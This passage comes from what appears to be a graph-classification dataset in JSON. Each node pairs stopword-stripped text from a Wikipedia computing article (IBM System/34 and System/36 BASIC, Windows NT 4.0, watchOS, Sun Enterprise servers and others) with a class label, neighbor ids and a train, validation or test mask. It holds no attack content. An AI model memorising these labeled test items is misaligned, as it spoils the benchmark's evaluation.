      5057,
      5069,
      7121,
      10708,
      2005,
      4568,
      11225,
      8668,
      9713,
      6643,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3244,
    "label": 9,
    "text": "System/34_BASIC:system/34 basic ibm system/34 basic interpreter ibm system/34 midrange computer system/34 basic first offered 1978 contained many trappings basic program would encountered time period trs-80 many offerings seventies early eighties s/34 basic uses conventions longer standard modern basics line numbers support newer features while/wend do/enddo with/end procedures properties forth basic interpreters written seventies tended odd things odd ways example apple ii programmer could embed dos command program via print prefaced character string chr 4 peek poke could used various basics examine memory content change even create ad hoc machine language program run system/34 basic tends stay away odd conventions however programmer could call alarm buzzing sound made terminal via print chr 7 basic statements expected entered capital letters operator press cmd2 use lowercase basic interpreter convert non-comment keywords uppercase basic could useful midrange computing environment ibm added extensions language specific hardware software conventions ibm system/34 family workstn file support indexed direct sequential disk files ability open close multiple printer files load/save libraries fixed disk core basic statements functions commands used advanced ibm-supplied statements included error error-trapping statement allows basic suspend error might otherwise stop basic program running perform error-handling routine instead variants include suffixing oflow zdiv error types statement immediately trap errors option allows basic program meet special criteria sometimes basic much user space since s/34 programs limited 64k area called code space contains current user program must reside within user space therefore users could choose option lprec causes basic compute double-precision long numerics option sprec provides space single-precision short numerics programmers prefer matrix mathematics lowest-numbered index 0 others prefer 1 option base 0 option base 1 accomplish uses option rpg ii programs s/34 could call basic programs could using chain statement chain passes control current basic module named module bearing list arguments become variables new module loaded def fn allows definition user function basic named referred program fnend placed last statement function four ways format basic input output first unformatted print input heart content second print using s/34 basic incorporate constant string variable line number label third print fields input fields place 5250-type display fields crt immediate mode fourth using workstation file opened open x ws name= forth performing various combinations write read workstation file using sda-generated screen formats similar s/34 applications write read well print using input using direct basic line number label contains keyword image image statement contains decimals commas dollar signs dashes pound signs representation substituted numeric alphameric values 3540 image form statement denotes size variables read written save numeric value .00 99,999.99 use notation 2959 form n 7.2 label tag line follows 260 begin_calculations 270 x 1 12 280 x*1.08 290 next x desired statement gosub begin_calculations used instead gosub 260 open close write rewrite delete append already familiar cobol programmers describe actions taken access s/34 disk files using basic n't possible access every single type s/34 file include system files libraries folders every user-created s/34 file fixed record length fortran programs use variable record lengths suffice disk files opened sequentially index relatively record number file delete-capable records deleted using delete statement add record use write append specified open statement update use rewrite s/34 basic print printer device file must used default printer file called 255 always exists basic started printer name basic255 opens device default printer terminal begins basic session desired possible create different printer file numbered 1 254 use open x printer name= forth specifying columns device id parameters needed pageoflow keyword used trap page overflow condition printer versions basic allow programmer sort array s/34 basic n't provide function provide interesting remedy programmer define array number elements target array use aidx didx create ascending descending index element new array contain number representing ordinal sorted position target array america sixth element array first alphabetical order setting aidx would cause 1 contain value 6 writing basic program much fun rewriting program time use therefore authors basic allow programmers save program code library member replace changes made save prog1 pgmrlib causes current module saved subroutine member type r named prog1 user library named pgmrlib note system/34 files part libraries disk file named fnf001 open statement like one work open 3 name=fnf001 sequential input n't matter library used access file fnf001 renumber s/34 basic command used renumber statements internal references statement numbers immediately recalculated system/34 basic dangerous command called free typing free followed filename deletes file without trace work every user file unless conflict security in-use condition blocks system/34 basic another dangerous command called lock lock command make current program source code inaccessible reversible always save unlocked copy using lock 1983 ibm announced system/36 family midrange computers system/34 basic system/36 basic similar however machine code incompatibility makes impossible port subroutine member basic program systems",
    "neighbors": [
      9714,
      3323,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 3245,
    "label": 2,
    "text": "Freespire:freespire freespire community-driven linux distribution currently owned pc/open systems llc derived linspire composed mostly free open source software providing users choice including proprietary software including multimedia codecs device drivers application software freespire 1.0 based debian freespire 2.0 based ubuntu linspire bought xandros originally planned switch back debian future freespire releases january 1 2018 pc/open systems announced purchased linspire xandros released freespire 3.0 linspire 7 available 79.99 freespire 3.0 free august 2005 distribution live cd based linspire source pools named freespire hit web accident distribution created andrew betts produced released linspire inc. freespire confused users actual product linspire request linspire distribution adopted development codename squiggle began looking new name linspire back generated publicity offered users free linspire purchase price discounted 0 using coupon code freespire september 9 2005 squiggle os longer active development april 24 2006 linspire announced project named freespire new freespire distribution announced linspire president former ceo kevin carmony follows model fedora supported red hat community since 2003 novell also started similar community project name opensuse suse linux product line second half 2005 xandros acquired linspire/freespire summer 2008 xandros plans keep freespire community developed distribution similar opensuse fedora respective commercial distributions freespire 2.0.8 released 30 november 2007 based ubuntu 7.04 final release distribution revived 3.0 january 2018 distribution debian-based community-driven -supported project tied commercial linspire distribution freespire includes previously proprietary elements linspire click n run cnr client elements linspire licenses like windows media audio compatibility libraries remain proprietary closed source consequently two versions freespire one proprietary closed source libraries one called freespire oss edition includes mostly open-source components freespire number in-house programs written haskell ocaml iso image builder hardware detection autoconfiguration package autobuilder debian library also programs managing cgi",
    "neighbors": [
      9253,
      11305,
      56,
      3131,
      59,
      4673,
      3654,
      1107,
      1110,
      5721,
      4192,
      3685,
      10860,
      9324,
      2671,
      3189,
      5755,
      11388,
      1150,
      8837,
      6797,
      10394,
      673,
      3745,
      7854,
      2738,
      4790,
      8907,
      3791,
      5343,
      4841,
      6890,
      7913,
      5356,
      9455,
      7920,
      5363,
      9971,
      9461,
      6393,
      5369,
      8957,
      7435,
      2321,
      3859,
      5397,
      4887,
      8476,
      5410,
      10530,
      3876,
      7483,
      3903,
      2375,
      5962,
      4951,
      2914,
      9064,
      7020,
      7534,
      2930,
      9074,
      1396,
      10127,
      3478,
      10149,
      8112,
      2485,
      439,
      10687,
      4039,
      9693,
      3550,
      6625,
      7140,
      485,
      8177,
      11263
    ],
    "mask": "Train"
  },
  {
    "node_id": 3246,
    "label": 5,
    "text": "MDaemon:mdaemon mdaemon email server email server application groupware functions microsoft windows first released alt-n technologies 1996 mdaemon supports multiple client-side protocols including imap pop3 smtp/msa webmail caldav carddav optionally activesync mobile clients outlook connector outlook add-on mdaemon features include built-in spam filter heuristic bayesian analysis ssl tls encryption client-side server-side email attachment encryption public shared folder support mailing list support sharing groupware data calendar contacts tasks notes also basis mdaemon tech security gateway email servers according securityspace.com mail mx server survey june 2018 mdaemon provides approximately 1 percent known internet mail servers fifth largest installation base identified servers",
    "neighbors": [
      1125,
      2695,
      6762,
      6797,
      7983,
      499,
      2679
    ],
    "mask": "Test"
  },
  {
    "node_id": 3247,
    "label": 3,
    "text": "Sun_Enterprise:sun enterprise sun enterprise range unix server computers produced sun microsystems 1996 2001 line launched sun ultra enterprise series ultra prefix dropped around 1998 systems based 64-bit ultrasparc microprocessor architecture related contemporary ultra series computer workstations like ultra series run solaris various models single-processor entry-level servers large high-end multiprocessor servers produced enterprise brand phased favor sun fire model line 2001 onwards first ultrasparc-i-based servers produced sun launched 1995 ultraserver 1 ultraserver 2 server configurations ultra 1 ultra 2 workstations respectively later renamed ultra enterprise 1 ultra enterprise 2 consistency server models later joined ultra enterprise 150 comprises ultra 1 motherboard tower-style enclosure 12 internal disk bays 1998 sun launched server configurations ultrasparc-iii-based ultra 5 ultra 10 workstations called enterprise ultra 5s enterprise ultra 10s respectively sun enterprise 450 rack-mountable entry-level multiprocessor server launched 1997 capable four ultrasparc ii processors sun enterprise 250 two-processor version launched 1998 later joined enterprise 220r enterprise 420r rack-mount servers 1999 220r 420r models respectively based motherboards ultra 60 ultra 80 workstations 250 replaced sun fire v250 450 sun fire v880 220r superseded sun fire 280r 420r sun fire v480 1996 sun replaced sparcserver 1000e sparccenter 2000e models ultra enterprise 3000 4000 5000 6000 servers multiprocessor servers based common hardware architecture incorporating gigaplane packet-switched processor/memory bus ultrasparc-i ii processors high availability fault-tolerance features included x000 systems intended mission-critical applications 3000 model deskside server configurable six processors 10 internal disks 4000 rack-mount system 14 processors 5000 essentially 4000 rack cabinet 6000 cabinet-housed data center server 30 processors 1999 enterprise 3500 4500 5500 6500 models announced upgraded x000 systems faster gigaplane bus 100 mhz depending processor clock speed compared 83 mhz 3500 also differs 3000 additional gigaplane slot resulting increased maximum eight processors enterprise x500 series replaced sun fire 3800/4800/6800 line enterprise 10000 e10k starfire development code name also used marketing purposes high-end multiprocessor data center server capable configured 64 ultrasparc ii processors largely designed cray research business systems division successor cray superserver 6400 related sun earlier sun-4d architecture servers cray acquired silicon graphics 1996 division sold sun launched starfire ultra enterprise 10000 1997 starfire based around fault-tolerant gigaplane-xb processor/memory interconnect like x000 x500 series servers starfire incorporates many high-availability features including ability partitioned multiple domains booted individually run instance solaris also possible remove resources running domain short notice reassign freed resources domains domain granularity one cpu board single system may 1-16 single cpu board carry 4 processors 4gb ram 4 sbus io boards rare option replace 4 sbus boards dual pci boards starfire first server vendor exceed 2000 tpc-d 300 gb benchmark starfire systems used number high-profile customers dot-com boom notably ebay typically sold well 1 million fully configured system starfire contains one two controller modules connected via ethernet external computer system service processor ssp controller modules interface system centerplane via jtag control partitioning available cpus memory i/o devices one domains effect distinct computer system partitioned booted without original ssp contains encrypted keys issued manufacturer e10k preserved computer history museum mountain view starfire superseded sun fire 12k/15k models",
    "neighbors": [
      3328,
      9090,
      9731,
      1801,
      1675,
      4235,
      1809,
      4241,
      2710,
      26,
      1818,
      8863,
      7072,
      9343,
      8994,
      1316,
      10789,
      1707,
      2731,
      5677,
      6322,
      2871,
      4664,
      4285,
      6464,
      7104,
      6338,
      9665,
      10051,
      10436,
      8007,
      1480,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      9955,
      11363,
      7270,
      11626,
      7148,
      7022,
      5872,
      5233,
      8179,
      11636,
      9333,
      631,
      11129,
      1788,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 3248,
    "label": 2,
    "text": "WatchOS:watchos watchos operating system apple watch developed apple inc based ios operating system many similar features released april 24 2015 along apple watch device runs watchos api called watchkit second version watchos 2 included support native third-party apps improvements released september 21 2015 third version watchos 3 released september 13 2016 emphasizing better performance including new watch faces stock apps fourth version watchos 4 released september 19 2017 fifth version watchos 5 released september 17 2018 adding third-party support new workouts along “ walkie-talkie ” feature sixth version watchos 6 announced june 3 2019 home screen rendered also known carousel composed circular application icons zoomed digital crown dragged launched touching display many apps miniaturized simplified versions ios counterparts prior watchos 3 glances provided fast access summarized view popular native third party applications used apple watch glances view opened swipe gesture watch face screen watchos 3 glances replaced redesigned control center much like one ios friends menu invoked side button acts dedicated dock apps different actions options appear depending user taps deep presses apple watch detects pressure-sensitive force touch display several years apple developing healthkit product bid change way people interact devices also conscious attempt penetrate lucrative healthcare wellness industry many observers believe hold huge growth opportunity apple confirmed jony ive apple chief designer interview said health crucial element apple watch since day inception developmental trajectory hardware watchos geared towards health-based capabilities ive pointed one primary apps shipped first watchos allowed users track communicate well encourage move exercise stand said many us phones us time ’ connected imagine something powerful times opportunities might present user opportunity phenomenal particularly ’ understand today terms technology capability headed.one recent updates watchos included applications keep users active also diagnose illnesses example app called deepheart deep learning network detect atrial fibrillation hypertension sleep apnea diabetes taps healthkit platform collect data particularly collected apple watch heart sensor watchos 5 first shown public san jose wwdc developer conference held apple instant watch-to-watch walkie-talkie mode first version watchos support first generation apple watch apple announced new version watchos contain features app store calculator tip tools audiobooks app apple voice memos app",
    "neighbors": [
      6155,
      4114,
      25,
      6180,
      6186,
      4139,
      8253,
      8262,
      2120,
      6218,
      8266,
      6221,
      2132,
      4180,
      10333,
      97,
      8303,
      8304,
      6264,
      8316,
      2179,
      132,
      6276,
      10382,
      6296,
      2201,
      10393,
      4251,
      6301,
      2207,
      2212,
      171,
      178,
      6329,
      4283,
      8388,
      10436,
      2248,
      8395,
      2259,
      8404,
      10455,
      6361,
      8410,
      4318,
      6369,
      10470,
      231,
      6377,
      2282,
      10478,
      242,
      8441,
      2301,
      6412,
      10512,
      273,
      274,
      4383,
      292,
      10535,
      2345,
      6445,
      4399,
      2355,
      4409,
      2363,
      6459,
      2365,
      2366,
      10562,
      4423,
      2388,
      6491,
      6495,
      8551,
      10602,
      6508,
      10608,
      2421,
      376,
      2424,
      8573,
      2439,
      394,
      6539,
      4492,
      414,
      2462,
      421,
      4521,
      4525,
      10676,
      2492,
      446,
      2502,
      456,
      464,
      6608,
      470,
      8662,
      6624,
      487,
      10730,
      10731,
      495,
      8687,
      6654,
      2560,
      10755,
      6675,
      8725,
      10776,
      4636,
      4637,
      8736,
      4643,
      6700,
      8754,
      10803,
      10809,
      8767,
      576,
      2625,
      8772,
      8774,
      8783,
      10838,
      607,
      2658,
      8806,
      6760,
      10856,
      6763,
      2673,
      2676,
      4727,
      633,
      634,
      8829,
      2686,
      6783,
      640,
      10878,
      6787,
      10883,
      10888,
      8842,
      10891,
      6797,
      671,
      673,
      2735,
      8879,
      6837,
      8889,
      713,
      10973,
      6884,
      4844,
      2819,
      11013,
      784,
      8977,
      787,
      789,
      4888,
      8991,
      823,
      9022,
      9027,
      11075,
      838,
      11079,
      6988,
      850,
      4957,
      9063,
      7020,
      2925,
      7027,
      2933,
      7039,
      11145,
      7052,
      7057,
      5022,
      2979,
      9123,
      11171,
      11173,
      935,
      5036,
      11184,
      2995,
      9141,
      9151,
      11204,
      11205,
      7118,
      9166,
      9174,
      7133,
      9182,
      5093,
      998,
      5105,
      3058,
      7154,
      9201,
      11257,
      5115,
      11271,
      3089,
      7187,
      11289,
      7217,
      1074,
      7224,
      5177,
      1083,
      7249,
      7253,
      3160,
      3162,
      9306,
      9308,
      3167,
      11363,
      7285,
      9335,
      1147,
      7292,
      3197,
      1150,
      5247,
      9343,
      11390,
      11391,
      7307,
      1177,
      9370,
      3228,
      11430,
      3241,
      3248,
      11459,
      7378,
      3286,
      7382,
      9430,
      9436,
      3293,
      1247,
      11489,
      9444,
      7403,
      9451,
      11501,
      5363,
      1273,
      5369,
      9466,
      7420,
      9468,
      1278,
      11513,
      1290,
      3338,
      9487,
      5397,
      1304,
      5406,
      7460,
      7477,
      11573,
      7483,
      1346,
      7492,
      7496,
      5452,
      5457,
      7507,
      7511,
      11608,
      7521,
      3426,
      5484,
      11629,
      11635,
      5492,
      5506,
      7561,
      7566,
      1428,
      9625,
      3483,
      11675,
      3487,
      3488,
      1445,
      9643,
      7601,
      11698,
      7614,
      1482,
      1508,
      3561,
      5619,
      1524,
      7682,
      9732,
      1549,
      5647,
      7697,
      1561,
      9762,
      3626,
      7727,
      9784,
      1608,
      1623,
      3672,
      3681,
      9826,
      5733,
      3691,
      9835,
      9844,
      7806,
      5784,
      9882,
      9887,
      7848,
      7857,
      9907,
      1718,
      5819,
      3772,
      7869,
      5823,
      5824,
      1736,
      3790,
      5840,
      1772,
      9964,
      1804,
      9999,
      5912,
      10016,
      10023,
      7983,
      7991,
      7999,
      10052,
      8020,
      10080,
      1891,
      5989,
      3948,
      8063,
      10113,
      8069,
      1927,
      6023,
      3978,
      1946,
      6049,
      10156,
      8109,
      1971,
      6078,
      4040,
      8136,
      2001,
      4068,
      2023,
      10215,
      4073,
      8170,
      4076,
      6128,
      2035,
      10235,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3249,
    "label": 9,
    "text": "IBM_System/36_BASIC:ibm system/36 basic ibm system/36 basic interpreter ibm system/36 midrange computer system/36 basic first offered 1983 contained many trappings basic program would encountered time period ibm pc commodore 64 vic-20 trs-80 many offerings seventies early eighties s/36 basic uses conventions longer standard modern basics line numbers support newer features while/wend do/enddo with/end procedures properties forth basic interpreters written seventies tended odd things odd ways example apple ii programmer could embed command program via print prefaced character string chr 4 peek poke could used various basics examine memory content change even create ad hoc machine language program run system/36 basic tends stay away odd conventions however programmer could call alarm buzzing sound made terminal via print chr 7 basic statements expected entered capital letters operator press cmd2 use lowercase basic interpreter convert non-comment keywords uppercase basic could useful midrange computing environment ibm added extensions language specific hardware software conventions ibm system/36 family workstn file support indexed direct sequential disk files ability open close multiple printer files load/save libraries fixed disk core basic statements functions commands used advanced ibm-supplied statements included error error-trapping statement allows basic suspend error might otherwise stop basic program running perform error-handling routine instead variants include suffixing oflow zdiv error types statement immediately trap errors option allows basic program meet special criteria sometimes basic much user space since s/36 programs limited 64k area called code space contains current user program must reside within user space therefore users could choose option lprec causes basic compute double-precision long numerics option sprec provides space single-precision short numerics programmers prefer matrix mathematics lowest-numbered index 0 others prefer 1 option base 0 option base 1 accomplish uses option rpg ii programs s/34 s/36 could call basic programs could using chain statement chain passes control current basic module named module bearing list arguments become variables new module loaded def fn allows definition user function basic named referred program fnend placed last statement function four ways format basic input output first unformatted print input heart content second print using s/36 basic incorporate constant string variable line number label third print fields input fields place 5250-type display fields crt immediate mode fourth using workstation file opened open x ws name= forth performing various combinations write read workstation file using sda-generated screen formats similar s/36 applications write read well print using input using direct basic line number label contains keyword image image statement contains decimals commas dollar signs dashes pound signs representation substituted numeric alphameric values form statement denotes size variables read written save numeric value .00 99,999.99 use notation label tag line follows desired statement gosub begin_calculations used instead gosub 260 open close write rewrite delete append already familiar cobol programmers describe actions taken access s/36 disk files using basic n't possible access every single type s/36 file include system files libraries folders every user-created s/36 file fixed record length fortran programs use variable record lengths suffice disk files opened sequentially index relatively record number file delete-capable records deleted using delete statement add record use write append specified open statement update use rewrite s/36 basic print printer device file must used default printer file called 255 always exists basic started printer name basic255 opens device default printer terminal begins basic session desired possible create different printer file numbered 1 254 use open x printer name= forth specifying columns device id parameters needed pageoflow keyword used trap page overflow condition printer versions basic allow programmer sort array s/36 basic n't provide function provide interesting remedy programmer define array number elements target array use aidx didx create ascending descending index element new array contain number representing ordinal sorted position target array america sixth element array first alphabetical order setting didx would cause 6 contain value 1 writing basic program much fun rewriting program time use therefore authors basic allow programmers save program code library member replace changes made save prog1 pgmrlib causes current module saved subroutine member type r named prog1 user library named pgmrlib note system/36 files part libraries disk file named fnf001 open statement like one work n't matter library used access file fnf001 renumber s/36 basic command used renumber statements internal references statement numbers immediately recalculated system/36 basic dangerous command called free typing free followed filename deletes file without trace work every user file unless conflict security in-use condition blocks system/36 basic another dangerous command called lock lock command make current program source code inaccessible reversible always save unlocked copy using lock system/34 basic system/36 basic similar however machine code incompatibility makes impossible port subroutine member basic program systems see also square root 2 pi π solution solution published mainframes 1980s 1990s",
    "neighbors": [
      9714,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 3250,
    "label": 3,
    "text": "Windows_NT_4.0:windows nt 4.0 windows nt 4.0 operating system part microsoft windows nt family operating systems released manufacturing july 31 1996 launched retail august 24 1996 microsoft primary business-oriented operating system introduction windows 2000 workstation server embedded editions sold editions feature graphical user interface similar windows 95 microsoft ended mainstream support windows nt 4.0 workstation june 30 2002 extended support june 30 2004 windows nt 4.0 server mainstream support ended december 31 2002 extended support december 31 2004 editions succeeded windows 2000 professional server respectively successor windows nt 3.51 windows nt 4.0 introduced user interface windows 95 windows nt family including windows shell file explorer known windows nt explorer time use nomenclature shell folders e.g computer also includes components introduced windows 95 internally windows nt 4.0 known shell update release sur many administrative tools notably user manager domains server manager domain name service manager still used old graphical user interfaces start menu windows nt 4.0 separated per-user shortcuts folders shared shortcuts folders separator line windows nt 4.0 includes enhancements microsoft plus windows 95 space cadet pinball table font smoothing showing window contents dragging high-color icons stretching wallpaper fit screen windows desktop update could also installed windows nt 4.0 update shell version install task scheduler windows nt 4.0 resource kit included desktop themes utility windows nt 4.0 preemptively multitasked 32-bit operating system designed work either uniprocessor symmetric multi-processor computers windows nt 4.0 last major release microsoft windows support alpha mips powerpc cpu architectures remained use businesses number years despite microsoft many efforts get customers upgrade windows 2000 newer versions also last release windows nt family branded windows nt although windows 2000 carried designation built nt technology although chief enhancement addition windows 95 shell several major performance scalability feature improvements core architecture kernel user32 com msrpc windows nt 4.0 also introduced concept system policies system policy editor important features server editions windows nt 4.0 include internet information services 2.0 microsoft frontpage 1.1 netshow services remote access service includes pptp server vpn functionality multi-protocol routing service new administrative wizards lite version network monitor utility shipped system management server enterprise edition introduced microsoft cluster server one significant difference previous versions windows nt graphics device interface gdi moved kernel mode rather user mode csrss process eliminated process-to-process context switch calling gdi functions resulting significant performance improvement windows nt 3.51 particularly graphical user interface however also mandated graphics printer drivers run kernel mode well resulting potential stability issues windows nt 4.0 first release microsoft windows include directx standard—version 2 shipped initial release windows nt 4.0 version 3 included release service pack 3 mid-1997 later versions directx released windows nt 4.0 however opengl supported used quake 3 unreal tournament early releases 4.0 numerous stability issues occur graphics printer vendors change drivers compatible kernel mode interfaces exported gdi change move gdi run process context caller prompted complaints nt workstation users real-time graphics performance change put considerable onus hardware manufacturers update device drivers windows nt 4.0 also included new windows task manager utility previous versions windows nt included task list utility shows applications currently desktop monitor cpu memory usage users forced use performance monitor task manager offers convenient way getting snapshot processes running system given time internet explorer 2 bundled windows nt 4 updated versions included service pack service pack 6 last service pack windows nt 4 included internet explorer 5.01 although also supports internet explorer 6.0 windows nt 4.0 upgraded ntvdm x86 emulation risc versions 286 486 sysprep introduced deployment tool windows nt 4.0 providing much greater stability windows 95 windows nt 4.0 less flexible desktop perspective much stability gained use protected memory hardware abstraction layer direct hardware access disallowed misbehaving programs terminated without needing computer restarted trade-off nt required much memory 32 mb normal desktop use 128 mb heavy 3d applications comparison consumer targeted products windows 95 nearly programs written windows 95 run windows nt many 3d games would partly limited directx support windows nt 4.0 third-party device drivers alternative access hardware directly poorly written drivers became frequent source infamous error known blue screen death bsod would require system restarted spite shipping year later windows 95 default plug play support device manager windows nt 4.0 greatly simplifies installation hardware devices although limited support could installed later many basic dos programs would run however graphical dos programs would run way accessed graphics hardware although windows nt 4.0 introduced application programming interface api defragmentation built-in defragmentation utility unlike windows 95 also windows nt 4.0 lacked usb support preliminary version would added oem editions windows 95 osr 2.1 difference nt family 9x family would remain release windows xp 2001 time apis — opengl directx — matured sufficiently efficient write common pc hardware hand hardware become powerful enough handle api processing overhead maximum amount supported physical random-access memory ram windows nt 4.0 4 gb maximum possible purely 32-bit x86 operating system comparison windows 95 fails boot computers approximately 480 mb memory like previous versions nt version 4.0 run multiple processor architectures windows 95 however run x86 windows nt 4.0 server included versions 4.0 4.5 backoffice small business server suite option pack available free-bundled cd starting around 1998 included iis 4.0 active server pages frontpage server extensions certificate server mts msmq cdonts internet authentication service ias indexing service microsoft management console 1.0 microsoft site server smtp nntp services new software several features distributed file system windows nt load balancing service wlbs delivered addons windows nt server 4.0 routing remote access service also downloadable feature replaced windows nt 4.0 separate ras multi-protocol routing services last version microsoft office compatible windows nt 4.0 office xp last version internet explorer compatible operating system internet explorer 6 sp1 service pack 6 6a required respectively windows nt 4.0 could directly upgraded windows 2000 windows xp professional windows nt 4.0 received seven service packs lifecycle well numerous service rollup packages option packs first service pack made available mips architecture service pack 3 final release powerpc architecture last full service pack service pack 6a sp6a service pack 7 planned one stage early 2001 became post sp6a security rollup full service pack released july 26 2001 16 months release windows 2000 nearly three months prior release windows xp addition bug fixes service packs also added multitude new features newer versions improvements internet information services public-key certificate authority functionality user accounts user profile improvements smart card support improved symmetric multiprocessing smp scalability clustering capabilities com support improvements user profile disk quotas event log service security configuration manager mmc snap-in ms-chapv2 ntlmv2 smb packet signing syskey boot improvements wins improvements routing remote access service rras pptp dcom/http tunneling improvements igmpv2 wmi active accessibility ntfs 3.0 support among others microsoft released five revisions windows nt 4.0 workstation server resource kit original release plus four supplements contained large number tools utilities desktops.exe allowed user multiple desktops well third-party software microsoft stopped providing security updates windows nt 4.0 workstation june 30 2004 windows nt 4.0 server december 31 2004 due major security flaws including microsoft security bulletin ms03-010 according microsoft could patched without significant changes core operating system according security bulletin due fundamental differences windows nt 4.0 windows 2000 successors infeasible rebuild software windows nt 4.0 eliminate vulnerability would require re-architecting significant amount windows nt 4.0 operating system ... would assurance applications designed run windows nt 4.0 would continue operate patched system june 2003 june 2007 127 security flaws identified patched windows 2000 server many may also affect windows nt 4.0 server however microsoft test security bulletins unsupported software",
    "neighbors": [
      2568,
      10257,
      6675,
      8211,
      11283,
      9757,
      11301,
      6697,
      1581,
      9276,
      11325,
      9791,
      7234,
      582,
      3142,
      1098,
      4174,
      10839,
      1113,
      601,
      8281,
      8798,
      7776,
      10338,
      8296,
      5225,
      8299,
      5231,
      7796,
      6265,
      8315,
      636,
      3197,
      637,
      639,
      641,
      7810,
      2179,
      8834,
      651,
      7307,
      6797,
      7311,
      10896,
      2193,
      2196,
      1186,
      3235,
      4771,
      1703,
      3751,
      7847,
      5293,
      9910,
      7351,
      6340,
      10950,
      6345,
      5324,
      10957,
      8913,
      8404,
      214,
      3289,
      4316,
      10972,
      736,
      4836,
      9448,
      10989,
      5363,
      2807,
      2811,
      6396,
      5380,
      6924,
      3344,
      3857,
      8976,
      8982,
      799,
      6431,
      10016,
      5413,
      10024,
      6441,
      10029,
      7983,
      3890,
      5939,
      1844,
      9525,
      6462,
      7486,
      321,
      2383,
      2901,
      11605,
      2391,
      4439,
      10079,
      11103,
      7523,
      10085,
      2919,
      3945,
      6510,
      6520,
      9593,
      894,
      2943,
      8576,
      10624,
      3463,
      5003,
      6028,
      8080,
      7057,
      11667,
      3477,
      6550,
      4505,
      3482,
      9114,
      412,
      4515,
      11683,
      933,
      3496,
      3514,
      6078,
      7615,
      7106,
      8132,
      6088,
      8654,
      10705,
      4051,
      8659,
      9173,
      5078,
      5594,
      5600,
      4074,
      9196,
      4590,
      5103,
      3573,
      10747,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 3251,
    "label": 8,
    "text": "Renewables.ninja:renewables.ninja renewables.ninja web tool developed imperial college london eth zürich shows estimate amount energy could generated wind solar farms location model tested iain staffell codeveloper renewables.ninja centre environmental policy imperial college london stefan pfenninger eth zürich estimate productivity wind farms planned construction europe next 20 years german electrical supplier rwe using test models output",
    "neighbors": [
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 3252,
    "label": 4,
    "text": "Christopher_Soghoian:christopher soghoian christopher soghoian born 1981 privacy researcher activist currently working senator ron wyden senator ’ senior advisor privacy cybersecurity 2012 2016 principal technologist american civil liberties union soghoian nephew sal soghoian former automation product manager apple inc. responsible applescript automator soghoian holds british us nationality received b.s james madison university computer science 2002 masters johns hopkins university security informatics 2005 phd indiana university informatics 2012 dissertation focused role third-party internet telecommunications service providers play facilitating law enforcement surveillance customers soghoian visiting fellow yale law school information society project ted senior fellow previously open society foundations fellow student fellow berkman center internet society harvard university soghoian research advocacy largely focused government surveillance research shed significant light use sophisticated surveillance technologies us law enforcement agencies exposing techniques public debate criticism august 2013 presentation hacker conference def con soghoian highlighted existence dedicated fbi team delivers malware computers mobile devices surveillance targets presentation soghoian stated discovered team reading heavily redacted government documents looking profiles ex-fbi contractors social network website linkedin october 2014 soghoian called attention fact fbi 2007 impersonated associated press effort deliver malware teenager washington state threatened bomb high school act deception strongly condemned leading news organizations including general counsel associated press february 2012 public speech soghoian criticized commercial market called zero-day security vulnerabilities topic yet receive significant attention mainstream press one month later soghoian quoted forbes lengthy article zero day market describing firms individuals sell software exploits “ modern-day merchants death ” selling “ bullets cyberwar. ” next several years several major media outlets published front-page stories industry often quotes soghoian criticizing providing hacking software governments december 2009 employee federal trade commission soghoian secretly audio recorded closed-door surveillance industry conference agency inspector general opened investigation soghoian conduct subsequently let go ftc recording executive sprint nextel revealed company created special website law enforcement agents obtain gps information subscribers website used process 8 million requests previous year recording subsequently cited alex kozinski chief judge ninth circuit court appeals u.s. v. pineda-moreno support view 1984 may come bit later predicted last june 2009 soghoian co-authored open letter google 37 prominent security privacy experts urging company protect privacy customers enabling https encryption default gmail cloud based services january 2010 google enabled https default users gmail subsequently products including search according google already considering https default soghoian recent years continued https advocacy calling news media law firms government agencies organizations encrypt websites may 2011 soghoian approached public relations firm burson-marsteller asked write anti-google op-ed criticizing company privacy issues associated social search product soghoian refused instead published email conversation subsequent investigation journalists revealed pr firm refused identify client soghoian retained facebook may 2011 soghoian filed complaint ftc claimed online backup service dropbox deceiving customers security services soon soghoian first publicly voiced concerns dropbox updated terms service privacy policy make clear company fact encrypt user data key known user company disclose users private data forced law enforcement agencies october 2010 soghoian filed complaint ftc claimed google intentionally leaking search queries sites users visited clicked link search results page two weeks later law firm filed class action lawsuit google practice lawsuit extensively quoted soghoian ftc complaint october 2011 google stopped leaking search queries sites users visited 2015 company settled search query leakage class action lawsuit 8.5 million dollars 2009 2010 worked us federal trade commission first ever in-house technical advisor division privacy identity protection ftc assisted investigations facebook twitter myspace netflix soghoian first gained public attention 2006 creator website generated fake airline boarding passes october 26 2006 soghoian created website allowed visitors generate fake boarding passes northwest airlines users could change boarding document name flight number city wished generator defaulted creating document osama bin laden soghoian claimed motivation website focus national attention ease passenger could evade no-fly lists information describing security vulnerabilities associated boarding pass modification widely publicized others including senator charles schumer d-ny security expert bruce schneier october 27 2006 then-congressman edward markey called soghoian arrest 2 october 28 2006 home raided agents fbi seize computers materials soghoian internet service provider voluntarily shut website received letter fbi claiming site posed national security threat october 29 2006 congressman markey issued revised statement stating soghoian go jail instead department homeland security put work fix boarding pass security flaws fbi closed criminal investigation november 2006 without filing charges tsa june 2007",
    "neighbors": [
      1315,
      3495,
      1783,
      7515,
      2110
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3253,
    "label": 6,
    "text": "Opera_File_System:opera file system opera file system file system used 3do discs recently implemented linux operafs read copied clonecd v4.2 later",
    "neighbors": [
      9762
    ],
    "mask": "None"
  },
  {
    "node_id": 3254,
    "label": 1,
